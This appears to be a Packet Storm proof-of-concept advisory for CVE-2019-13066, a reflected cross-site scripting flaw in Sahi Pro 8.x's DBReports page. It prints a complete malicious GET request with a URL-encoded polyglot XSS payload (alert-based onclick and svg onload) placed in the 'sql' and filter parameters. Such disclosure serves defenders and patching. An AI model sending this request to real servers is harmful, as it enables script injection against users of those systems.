Sahi Pro version 8.x suffers from a reflective cross site scripting vulnerability.
d98798c7c5d1bd15b5638f2adb139c4d916050bb165efe40f0af06e5c8a572e4# Exploit Title: Sahi pro (8.x ) Reflected XSS
# Date: 17-06-2019
# Exploit Author: x00pwn
# Vendor Homepage:https://sahipro.com/
# Software Link:https://sahipro.com/downloads-archive/
# Version: 8.0
# Tested on: Linux Ubuntu / Windows 7
# CVE : CVE-2019-13066
POC - The Sahi pro web-application has a script manager arena located athttp://examplesite:9999/_s_/dyn/pro/DBReports which has many different areas that are vulnerable to reflected XSS, by updating a scripts "Script Name", "Suite Name", "Base URL", "Android", "iOS", "Scripts Run", "Origin Machine", or "Comment", and attacker can trigger the reflected XSS.
The malicious request that is sent to the application -
GET /_s_/dyn/pro/DBReports?sql=SELECT%20SUITEREPORTS.SUITESTATUS%20AS%20ROWSTATUS%2C%20SUITEREPORTS.*%20FROM%20SUITEREPORTS%20WHERE%20PARENTSUITEID%20IS%20NULL%20AND%20SUITEREPORTS.SUITENAME%20LIKE%20%27%25%2F*-%2F*%60%2F*%5C%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert(%22Reflect_XSS_Vulnerable%22)%2F%2F%3E%5Cx3e%25%27%20%2F*ORDERBYSTART*%2F%20ORDER%20BY%20SUITEREPORTS.STARTTIME%20DESC%20%2F*ORDERBYEND*%2F%20%2F*LIMITSTART*%2F%20LIMIT%200%2C%2050%2F*LIMITEND*%2F&filterInfo=showTCSummaryKey%3A%3A%3Afalse---pageNumInfo%3A%3A%3A1---graphs%3A%3A%3Adisabled---useSQL%3A%3A%3Afalse---pass_threshold%3A%3A%3A100---filter_top_flt%3A%3A%3A50---fileType%3A%3A%3A---%3A%3A%3A50---%3A%3A%3A1---script_name_flt%3A%3A%3A---suite_name_flt%3A%3A%3A%2F*-%2F*%60%2F*%5C%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert(%22Reflect_XSS_Vulnerable%22)%2F%2F%3E%5Cx3e---base_url_flt%3A%3A%3A---browser_name_flt%3A%3A%3A---android_name_flt%3A%3A%3A---ios_name_flt%3A%3A%3A---range_flt%3A%3A%3A---from_flt%3A%3A%3Ayyyy-mm-dd---to_flt%3A%3A%3Ayyyy-mm-dd---time_taken_flt%3A%3A%3A00%3A00%3A00%20000---scripts_run_flt%3A%3A%3A---passed_scripts_flt%3A%3A%3A---failed_scripts_flt%3A%3A%3A---skipped_scripts_flt%3A%3A%3A---aborted_scripts_flt%3A%3A%3A---notSupported_scripts_flt%3A%3A%3A---passed_flt%3A%3A%3A---failed_flt%3A%3A%3A---status_flt%3A%3A%3A---machineName_flt%3A%3A%3A---comment_flt%3A%3A%3A---pass_threshold%3A%3A%3A100&pageNumber=1&pageSize=50
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed